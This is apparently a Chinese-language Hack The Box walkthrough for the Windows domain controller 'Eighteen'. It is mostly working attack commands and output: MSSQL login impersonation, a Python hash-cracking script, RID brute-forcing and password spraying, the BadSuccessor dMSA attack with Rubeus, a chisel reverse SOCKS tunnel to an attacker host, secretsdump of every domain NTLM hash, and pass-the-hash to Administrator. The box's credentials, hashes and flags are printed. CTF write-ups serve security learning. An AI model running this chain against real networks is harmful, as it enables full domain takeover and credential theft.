[Season9] Eighteen WP

Posted on Edited on Word count in article: 1.6k Reading time ≈ 6 mins.
Hack The Box [Season9] Eighteen Windows Easy

kevin / iNa2we6haRj2gaw!

Recon

1
2
3
4
5
6
7
8
9
10
11
12
13
PORT     STATE SERVICE  REASON          VERSION
80/tcp   open  http     syn-ack ttl 127 Microsoft IIS httpd 10.0
1433/tcp open  ms-sql-s syn-ack ttl 127 Microsoft SQL Server  16.00.1000.00
| ms-sql-ntlm-info: 
|   Target_Name: EIGHTEEN
|   NetBIOS_Domain_Name: EIGHTEEN
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: eighteen.htb
|   DNS_Computer_Name: DC01.eighteen.htb
|   DNS_Tree_Name: eighteen.htb
|_  Product_Version: 10.0.26100
|_  +7h00m00s from scanner time.
5985/tcp open  http     syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

User Flag

连接 mssql

1
mssqlclient.py kevin@$IP

可以 impersonate appdev

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
SQL (kevin  guest@master)> enum_impersonate
execute as   database   permission_name   state_desc   grantee   grantor   
----------   --------   ---------------   ----------   -------   -------   
b'LOGIN'     b''        IMPERSONATE       GRANT        kevin     appdev 

SQL (kevin  guest@master)> EXECUTE AS LOGIN = 'appdev'
SQL (appdev  appdev@master)> use financial_planner
ENVCHANGE(DATABASE): Old Value: master, New Value: financial_planner
INFO(DC01): Line 1: Changed database context to 'financial_planner'.
SQL (appdev  appdev@financial_planner)> select * from users
  id   full_name   username   email                password_hash                                                                                            is_admin   created_at   
----   ---------   --------   ------------------   ------------------------------------------------------------------------------------------------------   --------   ----------   
1002   admin       admin      admin@eighteen.htb   pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133          1   2025-10-29 05:39:03 

SELECT COLUMN_NAME, DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='users'

hashcat 跑太慢了,用 ai 生成个脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import hashlib
import binascii
from werkzeug.security import check_password_hash

target_hash = "pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133"

wordlist_path = "/usr/share/wordlists/rockyou.txt" 

print(f"[*] Starting attack on: {target_hash}")
print("[*] Using Werkzeug's native check_password_hash function...")

try:
    with open(wordlist_path, "r", errors="ignore") as f:
        for line in f:
            password = line.strip()
            
            if check_password_hash(target_hash, password):
                print(f"\n[+] PASSWORD FOUND: {password}")
                break
    else:
        print("\n[-] Password not found in wordlist.")

except FileNotFoundError:
    print(f"\n[!] Error: Wordlist not found at {wordlist_path}")
except Exception as e:
    print(f"\n[!] Error: {e}")

得到结果 iloveyou1

现在我们可以使用 admin:iloveyou1 登录网站后台,好像用处不大

rid brute 获取用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
$ nxc mssql $IP -u kevin -p 'iNa2we6haRj2gaw!' --rid-brute
MSSQL       10.10.11.95     1433   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
MSSQL       10.10.11.95     1433   DC01             [+] DC01\kevin:iNa2we6haRj2gaw! 
MSSQL       10.10.11.95     1433   DC01             498: EIGHTEEN\Enterprise Read-only Domain Controllers
MSSQL       10.10.11.95     1433   DC01             500: EIGHTEEN\Administrator
MSSQL       10.10.11.95     1433   DC01             501: EIGHTEEN\Guest
MSSQL       10.10.11.95     1433   DC01             502: EIGHTEEN\krbtgt
MSSQL       10.10.11.95     1433   DC01             512: EIGHTEEN\Domain Admins
MSSQL       10.10.11.95     1433   DC01             513: EIGHTEEN\Domain Users
MSSQL       10.10.11.95     1433   DC01             514: EIGHTEEN\Domain Guests
MSSQL       10.10.11.95     1433   DC01             515: EIGHTEEN\Domain Computers
MSSQL       10.10.11.95     1433   DC01             516: EIGHTEEN\Domain Controllers
MSSQL       10.10.11.95     1433   DC01             517: EIGHTEEN\Cert Publishers
MSSQL       10.10.11.95     1433   DC01             518: EIGHTEEN\Schema Admins
MSSQL       10.10.11.95     1433   DC01             519: EIGHTEEN\Enterprise Admins
MSSQL       10.10.11.95     1433   DC01             520: EIGHTEEN\Group Policy Creator Owners
MSSQL       10.10.11.95     1433   DC01             521: EIGHTEEN\Read-only Domain Controllers
MSSQL       10.10.11.95     1433   DC01             522: EIGHTEEN\Cloneable Domain Controllers
MSSQL       10.10.11.95     1433   DC01             525: EIGHTEEN\Protected Users
MSSQL       10.10.11.95     1433   DC01             526: EIGHTEEN\Key Admins
MSSQL       10.10.11.95     1433   DC01             527: EIGHTEEN\Enterprise Key Admins
MSSQL       10.10.11.95     1433   DC01             528: EIGHTEEN\Forest Trust Accounts
MSSQL       10.10.11.95     1433   DC01             529: EIGHTEEN\External Trust Accounts
MSSQL       10.10.11.95     1433   DC01             553: EIGHTEEN\RAS and IAS Servers
MSSQL       10.10.11.95     1433   DC01             571: EIGHTEEN\Allowed RODC Password Replication Group
MSSQL       10.10.11.95     1433   DC01             572: EIGHTEEN\Denied RODC Password Replication Group
MSSQL       10.10.11.95     1433   DC01             1000: EIGHTEEN\DC01$
MSSQL       10.10.11.95     1433   DC01             1101: EIGHTEEN\DnsAdmins
MSSQL       10.10.11.95     1433   DC01             1102: EIGHTEEN\DnsUpdateProxy
MSSQL       10.10.11.95     1433   DC01             1601: EIGHTEEN\mssqlsvc
MSSQL       10.10.11.95     1433   DC01             1602: EIGHTEEN\SQLServer2005SQLBrowserUser$DC01
MSSQL       10.10.11.95     1433   DC01             1603: EIGHTEEN\HR
MSSQL       10.10.11.95     1433   DC01             1604: EIGHTEEN\IT
MSSQL       10.10.11.95     1433   DC01             1605: EIGHTEEN\Finance
MSSQL       10.10.11.95     1433   DC01             1606: EIGHTEEN\jamie.dunn
MSSQL       10.10.11.95     1433   DC01             1607: EIGHTEEN\jane.smith
MSSQL       10.10.11.95     1433   DC01             1608: EIGHTEEN\alice.jones
MSSQL       10.10.11.95     1433   DC01             1609: EIGHTEEN\adam.scott
MSSQL       10.10.11.95     1433   DC01             1610: EIGHTEEN\bob.brown
MSSQL       10.10.11.95     1433   DC01             1611: EIGHTEEN\carol.white
MSSQL       10.10.11.95     1433   DC01             1612: EIGHTEEN\dave.green

使用得到的用户名列表进行密码喷洒

1
2
3
4
5
6
7
8
9
Administrator
mssqlsvc
jamie.dunn
jane.smith
alice.jones
adam.scott
bob.brown
carol.white
dave.green

对 winrm 进行密码喷洒

1
2
3
4
5
6
7
8
$ nxc winrm $IP -u users.txt -p 'iloveyou1'
WINRM       10.10.11.95     5985   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
WINRM       10.10.11.95     5985   DC01             [-] eighteen.htb\Administrator:iloveyou1
WINRM       10.10.11.95     5985   DC01             [-] eighteen.htb\mssqlsvc:iloveyou1
WINRM       10.10.11.95     5985   DC01             [-] eighteen.htb\jamie.dunn:iloveyou1
WINRM       10.10.11.95     5985   DC01             [-] eighteen.htb\jane.smith:iloveyou1
WINRM       10.10.11.95     5985   DC01             [-] eighteen.htb\alice.jones:iloveyou1
WINRM       10.10.11.95     5985   DC01             [+] eighteen.htb\adam.scott:iloveyou1 (Pwn3d!)

得到用户 eighteen.htb\adam.scott:iloveyou1,登录 winrm,得到 user flag

1
2
3
4
evil-winrm -i $IP -u 'adam.scott' -p 'iloveyou1'

*Evil-WinRM* PS C:\Users\adam.scott> type desktop/user.txt
ed79a0a16c7d14b46890de4be15dffee

Root Flag

枚举发现靶机是一台 Windows Server 2025 的域控,可能受到 BadSuccessor 影响

使用 Pentest-Tools-Collection/tools/ActiveDirectory/BadSuccessor.ps1 at main · LuemmelSec/Pentest-Tools-Collection

脚本需要进行部分修改

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
# 修改脚本
*Evil-WinRM* PS C:\Users\adam.scott> (Get-Content BadSuccessor.ps1) -replace 'Out-GridView', 'Format-Table -AutoSize' | Set-Content BadSuccessor.ps1
# 导入模块
*Evil-WinRM* PS C:\Users\adam.scott> . .\BadSuccessor.ps1
# 检查
*Evil-WinRM* PS C:\Users\adam.scott> BadSuccessor -mode check -Domain eighteen.htb

[+] Checking for Windows Server 2025 Domain Controllers...
[!] Windows Server 2025 DCs found. BadSuccessor may be exploitable!

HostName          OperatingSystem
--------          ---------------
DC01.eighteen.htb Windows Server 2025 Datacenter



IdentitySID                                   IdentityName    OU                          Right
-----------                                   ------------    --                          -----
S-1-5-21-1152179935-589108180-1989892463-1604 eighteen.htb\IT OU=Staff,DC=eighteen,DC=htb CreateChild

# 创建 dMSA
*Evil-WinRM* PS C:\Users\adam.scott\Documents> BadSuccessor -mode exploit -Path "OU=Staff,DC=eighteen,DC=htb" -Name "bad_DMSA" -DelegatedAdmin "adam.scott" -DelegateTarget "Administrator" -domain "eighteen.htb"
Creating dMSA at: LDAP://eighteen.htb/OU=Staff,DC=eighteen,DC=htb
0
0
0
0
Successfully created and configured dMSA 'bad_DMSA'
Object adam.scott can now impersonate Administrator

# 获取当前用户
*Evil-WinRM* PS C:\Users\adam.scott\Documents> .\Rubeus.exe asktgt /user:adam.scott /password:iloveyou1 /opsec /nowrap /force

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3

[*] Action: Ask TGT

[*] Got domain: eighteen.htb
[*] Using domain controller: DC01.eighteen.htb (fe80::214d:667:a861:ca2a%3)
[!] Pre-Authentication required!
[!]     AES256 Salt: EIGHTEEN.HTBadam.scott
[*] Using rc4_hmac hash: 9964DAE494A77414E34AFF4F34412166
[*] Building AS-REQ (w/ preauth) for: 'eighteen.htb\adam.scott'
[*] Using domain controller: fe80::214d:667:a861:ca2a%3:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFpjCCBaKgAwIBBaEDAgEWooIEqTCCBKVhggShMIIEnaADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMRUlHSFRFRU4uSFRCo4IEYTCCBF2gAwIBEqEDAgECooIETwSCBEt8MPAlqHpLiCcfqwwy+42xeRUZLCu/JVspQD43cP+7aBgp4w5vUTNETHHmbC6N9Nth/pCYoXGgyHjgCcnyLl4vS2aQoIhWg2CCTiV/wKRJLr1c45pFb8gxrU4xCOHYdPzSUY7bz4ioPcfeGqyIZ2lv8RA0/HyVBizuOG+72qKA6lFgCqVWERhvueZ6W9SlMzhxMcT+ZKSESq3eUxPvJWOq7WlU5UHBtqtEw4MZ7ac5JigtVFqf21v3R7tBPOQ1ryyqZuaUjOyWNlF/43nRaUmWNonjfVVYYMcYV7O2QTglTjOJevPIfAis2RTgwwdiy/O38uWPzYqO+gMCodJ/tApREny2dDPbrzTYfJhMULXKWqp0ZLdGiFP9BGXwo8YNAvnfLtYNXZvjEtRvxfelQ+u5y4ay40EugPtU/N48YZx/fIShO226kU/0N4Q0YYFQgXjaxHYCTJOt5I1jMmj0AVz3bQW0tQDUyrF0hy196aT2E7R5bVyP7JCFp0sARSaiJplq6ahPBEemn8zNlwT+vTSV2fmZKNoffYyupnHkXOtwmMTtAvSCRZ/H5GDUZKIzw00YiOyL2yqyedXbmpaGysKptZ79NX/beb/DL82nnIFpUB0i21ALYyp1q5U4s6l2Zo633mTDyabkbi7kJWreCRlh1hv9bk5CzCb4enSi0LdWCpM8WsR+/D6mLk7tdTO5MA+17RnqPjmTkog9HwB+Pbo/NZjZgSCmL1cZW6g+iqtZaa5CHfCTSEud7KpTvmkhtWpq4ly9oOCYnbLZx9uOyJrnwY8pq9uHpFRgcreP8Q+rl35xTJvlLFU0ff6PvgFXwWIPhSGfl6vMDDczhn2RzgzoVXVuuXb63a1/HI9EdYrcBo9N9eZmNy8eyhrVkMQ0arTJCud8VTki3W6Wibd0EhvGZTnEb6GH+G61Jf1i7TkhSrjHUYfpI/bkW9NuK8iwwTIhao+9XbevMlbgTIUAkMH8BRHsibrV9AtVnvHl2Zop37s1l+dbjtkpz6XLYtDNcE4t2GuMXqHVYwhHLrKcU3z9alDYWMSPl8Rls+rf9vrTzir1/OgU5a0bU/QZiSHgtqQ6mrQeu/EzeUXGIq6D5f/hObGueRJdC1Dp79WsaizqNUPAj2jIuMwA1WqFz6XgPZFpOrTiraPEGwdy4SerVlWcETdf3M62qljovcsjlooMTJFfKQq1j1r+y2iPSxI6KJgbq7o3yVQPAYcUj3lPxnSfBMYYPCNJdI/VLBSMD+Jm+67MWZNM4jRwT+1NqmzhnLEmibspLLmrZ05kdvIEac0G+RduaWnQX0YU5dhHMQi413WXeTRUJdszw5Bt55+4QQTJ3yD0PYthqGIQduX7p96IOHp7sbRlWASOVHbWksbj6OX8Eec3sFRQXUFITqv9leIJdTbajTjAxrnA8FkKbfgYkFJiKAgbpAEEqqgIjvlPoeDdTsR64fCAl+11o4HoMIHloAMCAQCigd0Egdp9gdcwgdSggdEwgc4wgcugKzApoAMCARKhIgQg/Bn7bJNCwC3SIkDqc/h9fEmnbkurm2zAFG6VMcy0KjmhDhsMRUlHSFRFRU4uSFRCohcwFaADAgEBoQ4wDBsKYWRhbS5zY290dKMHAwUAQOEAAKURGA8yMDI1MTEyMTIwMTQ0OVqmERgPMjAyNTExMjIwNjE0NDlapxEYDzIwMjUxMTI4MjAxNDQ5WqgOGwxFSUdIVEVFTi5IVEKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDEVJR0hURUVOLkhUQg==

  ServiceName              :  krbtgt/EIGHTEEN.HTB
  ServiceRealm             :  EIGHTEEN.HTB
  UserName                 :  adam.scott (NT_PRINCIPAL)
  UserRealm                :  EIGHTEEN.HTB
  StartTime                :  11/21/2025 12:14:49 PM
  EndTime                  :  11/21/2025 10:14:49 PM
  RenewTill                :  11/28/2025 12:14:49 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  /Bn7bJNCwC3SIkDqc/h9fEmnbkurm2zAFG6VMcy0Kjk=
  ASREP (key)              :  9964DAE494A77414E34AFF4F34412166

# 获取 krbtgt 票据
*Evil-WinRM* PS C:\Users\adam.scott\Documents> .\Rubeus.exe asktgs /targetuser:bad_DMSA$ /service:krbtgt/eighteen.htb /opsec /dmsa /nowrap /ptt /ticket:doIFpjCCBaKgAwIBBaEDAgEWooIEqTCCBKVhggShMIIEnaADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMRUlHSFRFRU4uSFRCo4IEYTCCBF2gAwIBEqEDAgECooIETwSCBEt8MPAlqHpLiCcfqwwy+42xeRUZLCu/JVspQD43cP+7aBgp4w5vUTNETHHmbC6N9Nth/pCYoXGgyHjgCcnyLl4vS2aQoIhWg2CCTiV/wKRJLr1c45pFb8gxrU4xCOHYdPzSUY7bz4ioPcfeGqyIZ2lv8RA0/HyVBizuOG+72qKA6lFgCqVWERhvueZ6W9SlMzhxMcT+ZKSESq3eUxPvJWOq7WlU5UHBtqtEw4MZ7ac5JigtVFqf21v3R7tBPOQ1ryyqZuaUjOyWNlF/43nRaUmWNonjfVVYYMcYV7O2QTglTjOJevPIfAis2RTgwwdiy/O38uWPzYqO+gMCodJ/tApREny2dDPbrzTYfJhMULXKWqp0ZLdGiFP9BGXwo8YNAvnfLtYNXZvjEtRvxfelQ+u5y4ay40EugPtU/N48YZx/fIShO226kU/0N4Q0YYFQgXjaxHYCTJOt5I1jMmj0AVz3bQW0tQDUyrF0hy196aT2E7R5bVyP7JCFp0sARSaiJplq6ahPBEemn8zNlwT+vTSV2fmZKNoffYyupnHkXOtwmMTtAvSCRZ/H5GDUZKIzw00YiOyL2yqyedXbmpaGysKptZ79NX/beb/DL82nnIFpUB0i21ALYyp1q5U4s6l2Zo633mTDyabkbi7kJWreCRlh1hv9bk5CzCb4enSi0LdWCpM8WsR+/D6mLk7tdTO5MA+17RnqPjmTkog9HwB+Pbo/NZjZgSCmL1cZW6g+iqtZaa5CHfCTSEud7KpTvmkhtWpq4ly9oOCYnbLZx9uOyJrnwY8pq9uHpFRgcreP8Q+rl35xTJvlLFU0ff6PvgFXwWIPhSGfl6vMDDczhn2RzgzoVXVuuXb63a1/HI9EdYrcBo9N9eZmNy8eyhrVkMQ0arTJCud8VTki3W6Wibd0EhvGZTnEb6GH+G61Jf1i7TkhSrjHUYfpI/bkW9NuK8iwwTIhao+9XbevMlbgTIUAkMH8BRHsibrV9AtVnvHl2Zop37s1l+dbjtkpz6XLYtDNcE4t2GuMXqHVYwhHLrKcU3z9alDYWMSPl8Rls+rf9vrTzir1/OgU5a0bU/QZiSHgtqQ6mrQeu/EzeUXGIq6D5f/hObGueRJdC1Dp79WsaizqNUPAj2jIuMwA1WqFz6XgPZFpOrTiraPEGwdy4SerVlWcETdf3M62qljovcsjlooMTJFfKQq1j1r+y2iPSxI6KJgbq7o3yVQPAYcUj3lPxnSfBMYYPCNJdI/VLBSMD+Jm+67MWZNM4jRwT+1NqmzhnLEmibspLLmrZ05kdvIEac0G+RduaWnQX0YU5dhHMQi413WXeTRUJdszw5Bt55+4QQTJ3yD0PYthqGIQduX7p96IOHp7sbRlWASOVHbWksbj6OX8Eec3sFRQXUFITqv9leIJdTbajTjAxrnA8FkKbfgYkFJiKAgbpAEEqqgIjvlPoeDdTsR64fCAl+11o4HoMIHloAMCAQCigd0Egdp9gdcwgdSggdEwgc4wgcugKzApoAMCARKhIgQg/Bn7bJNCwC3SIkDqc/h9fEmnbkurm2zAFG6VMcy0KjmhDhsMRUlHSFRFRU4uSFRCohcwFaADAgEBoQ4wDBsKYWRhbS5zY290dKMHAwUAQOEAAKURGA8yMDI1MTEyMTIwMTQ0OVqmERgPMjAyNTExMjIwNjE0NDlapxEYDzIwMjUxMTI4MjAxNDQ5WqgOGwxFSUdIVEVFTi5IVEKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDEVJR0hURUVOLkhUQg== /outfile:ticket.kirbi

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building DMSA TGS-REQ request for 'bad_DMSA$' from 'adam.scott'
[+] Sequence number is: 751902089
[*] Using domain controller: DC01.eighteen.htb (fe80::214d:667:a861:ca2a%3)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):

      doIFzDCCBcigAwIBBaEDAgEWooIE0DCCBMxhggTIMIIExKADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMRUlHSFRFRU4uSFRCo4IEiDCCBISgAwIBEqEDAgECooIEdgSCBHJ9ex6NsK6AxfpCczVqOm8ZjD+VUhFsf94QlFn4ejsJ8IBl5kvI7fi8F8pAxcjQJOqwbWa9xoi5ZV3mM7q/JEt3dPwgDyJuwKUyJY5s1ea1V44NbJdZBN6pZsbeE0iHut+uV8iHAomOG12DUcBhwLTZpKH6xKEowW3aTZjy6b/H4ni85e8tVEPBISGsBFwl8MUKbSFeTgKY8J3phn61f8xjTU6cqStE4+061ygQ2+j6uUY41KWO68J57jhKrpNFVNmZPmA94NUv71A2M+0d+7A7Z6nKgC+Okuy3a3Ebqeot1m8LtlJ4hDaYOq84XDrxjqmciUVXnPkU/VQo3fhm7HCbidpc8/3LYYBb18ijaxoP/Zuj+LJB5wy8XdB2cC+OGWsEivtEqx9pPwGjazX0dnarT0QPV8BEAbeSf4s/MYywQQco2lnPUR5JPUesQ3bYZIfq+7htmQVGh/qIdC0ENEYPNMGp2qNGeeqfi85SgbjxHLf5IduVpebRkh6iiRaDqLsx5gW2eoiw67gxwAu5pd/nfBlS5HSSklx6V0u7Mp3B02KQADxZ7t3EgeWuQivGeS2lURKaWuOexGLpsNrFaNtVMFfpp13TqMsMn4CC5u6nNRgh5AEpxzSK8ag2sAY1yXsaELTiszRDPhlLoW+USR6ZJ3J9ZXEWvjE9ktxheCIDNy9o8xQP6XaxMVkXQw5Ajf+GMDYwBulkHhDN3cc4IvVghdXo0oIiaq2qgdpF2sdVL0FXrR6Cbpc6QH0+0lLxMKaKe2tMbpzbG424Wyaf/GKD/jpDMlOLOOB6mDR/OC2qJFmKbFOW5kHuFwUQuGfLCNi5qnR9igZPCTAIjaU/IcnwN/UQNGID14y5rynP+kjFbJMCUfdrlnEbcNKeMrjqUsI2TpuFd6B9iUyVgxHUJZuUk3Pz8X/jw6+MrGP708R5yGFgCS5PCWRY7OK4Z5ZUjrgJ31s9WTrGelIehJ7WI/mGyXN5nfxqKxNs1vnwiQaNloMzSjd8PXCx0dySh3Hf4QlvQgP0WnDzjoqvDDwDfedjYlJv4+bZwJ8YPDqlF6dvNK5wTB1dq4m7w64cG665NsUweF1IcuNu0ABbrvQg9KbudhmyUY6VybxxIih+StgQNIZG5YZ42UFidG661HsvG1CUrk8H4Bs3S0txHcH1NWn//dyjDZHfIWn4qFZtmWZOB5a8dQ5uN/zqgb4nilwSMIu3tHKGW4pg1G1DAnxifm87PgzWEu4hZeYiNkyZ9orRlR0/u2zGyczEkVNso7dcQzpt5kQGWry4B87dQV21vFt43+9sasTF4CYYtcCsB4oVGzGn8dzhGGc5oZ2Lovj7G/6ljiSjZyQT09xJLqk8MlTfCP44gzx1sMH+hPaWBWt0YlhybeV226EC5eKMTOzbmnPEWWbruET9btCzKAqKz+H+OpqGD/UU41XodI25wFpppTHzZw9+smu9lEhppnpyWmvQBMsKnQHk7ZSP+AVlshvnHnNP22i6v4Tq/JpqL/9yXxtuo4HnMIHkoAMCAQCigdwEgdl9gdYwgdOggdAwgc0wgcqgKzApoAMCARKhIgQgJsjHzrIGUou5+3d96zmlzqcMXC3mh7bwvaSow4hErSOhDhsMZWlnaHRlZW4uaHRiohYwFKADAgEBoQ0wCxsJYmFkX0RNU0EkowcDBQBAoQAApREYDzIwMjUxMTIxMjAyMDU3WqYRGA8yMDI1MTEyMTIwMzU1N1qnERgPMjAyNTExMjgyMDE0NDlaqA4bDEVJR0hURUVOLkhUQqkhMB+gAwIBAqEYMBYbBmtyYnRndBsMRUlHSFRFRU4uSFRC

  ServiceName              :  krbtgt/EIGHTEEN.HTB
  ServiceRealm             :  EIGHTEEN.HTB
  UserName                 :  bad_DMSA$ (NT_PRINCIPAL)
  UserRealm                :  eighteen.htb
  StartTime                :  11/21/2025 12:20:57 PM
  EndTime                  :  11/21/2025 12:35:57 PM
  RenewTill                :  11/28/2025 12:14:49 PM
  Flags                    :  name_canonicalize, pre_authent, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  JsjHzrIGUou5+3d96zmlzqcMXC3mh7bwvaSow4hErSM=
  Current Keys for bad_DMSA$: (aes256_cts_hmac_sha1) 4F55545B8D1E3F1E0B70A19738C1B631CFDFE2867F6E25027CA400BF4F7FB7E2


[*] Ticket written to ticket.kirbi

配置代理

1
2
./chisel server --socks5 --reverse --port 8080
./chisel.exe client 10.10.16.102:8080 R:socks

dump hash

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
$ ticketConverter.py ticket.kirbi ticket.ccache
$ export KRB5CCNAME=ticket.ccache 
$ faketime -f "+7h" proxychains secretsdump.py eighteen.htb/bad_dmsa\$@dc01.eighteen.htb -k -no-pass -just-dc-ntlm 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
/root/.local/pipx/venvs/impacket/lib/python3.10/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc01.eighteen.htb:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  EIGHTEEN.HTB:88  ...  OK
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc01.eighteen.htb:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc01.eighteen.htb:49676  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  EIGHTEEN.HTB:88  ...  OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b133be956bfaddf9cea56701affddec:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a7c7a912503b16d8402008c1aebdb649:::
mssqlsvc:1601:aad3b435b51404eeaad3b435b51404ee:c44d16951b0810e8f3bbade300966ec4:::
eighteen.htb\jamie.dunn:1606:aad3b435b51404eeaad3b435b51404ee:9fbaaf9e93e576187bb840e93971792a:::
eighteen.htb\jane.smith:1607:aad3b435b51404eeaad3b435b51404ee:42554e3213381f9d1787d2dbe6850d21:::
eighteen.htb\alice.jones:1608:aad3b435b51404eeaad3b435b51404ee:43f8a72420ee58573f6e4f453e72843a:::
eighteen.htb\adam.scott:1609:aad3b435b51404eeaad3b435b51404ee:9964dae494a77414e34aff4f34412166:::
eighteen.htb\bob.brown:1610:aad3b435b51404eeaad3b435b51404ee:7e86c41ddac3f95c986e0382239ab1ea:::
eighteen.htb\carol.white:1611:aad3b435b51404eeaad3b435b51404ee:6056d42866209a6744cb6294df075640:::
eighteen.htb\dave.green:1612:aad3b435b51404eeaad3b435b51404ee:7624e4baa9c950aa3e0f2c8b1df72ee9:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d79b6837ac78c51c79aab3d970875584:::
Pwn$:12102:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
dMSA_Luemmel$:12110:aad3b435b51404eeaad3b435b51404ee:9479c12905374756485f184d31e4ec98:::
kreep_dmsa$:12111:aad3b435b51404eeaad3b435b51404ee:ecb0d2b94a4d11d497c42509ffc7e524:::
bad_DMSA$:12112:aad3b435b51404eeaad3b435b51404ee:1e2c79d68b83d013a3dd668c38cb1b7f:::
kreep_dmsa_new$:12113:aad3b435b51404eeaad3b435b51404ee:51945e4f9686351412afba5c72a34239:::
bad_root$:12114:aad3b435b51404eeaad3b435b51404ee:95f0138bff73b060d09007ca19df9f94:::
bad_root2$:12115:aad3b435b51404eeaad3b435b51404ee:f324fe8324bc6dd8ea3f8cfbe38f8b66:::
web_svc$:12116:aad3b435b51404eeaad3b435b51404ee:7fc0d6fd9a8217facbd7b382508e23aa:::
bad_ps$:12117:aad3b435b51404eeaad3b435b51404ee:51cc217548900e3aa68e38186bc78bcf:::
[*] Cleaning up...

pass the hash

1
2
3
4
5
$ faketime -f "+7h" proxychains evil-winrm -i $IP -u Administrator --hash 0b133be956bfaddf9cea56701affddec


*Evil-WinRM* PS C:\Users\Administrator> type desktop\root.txt
87ce69fde501eed974cfa6cdd5418b11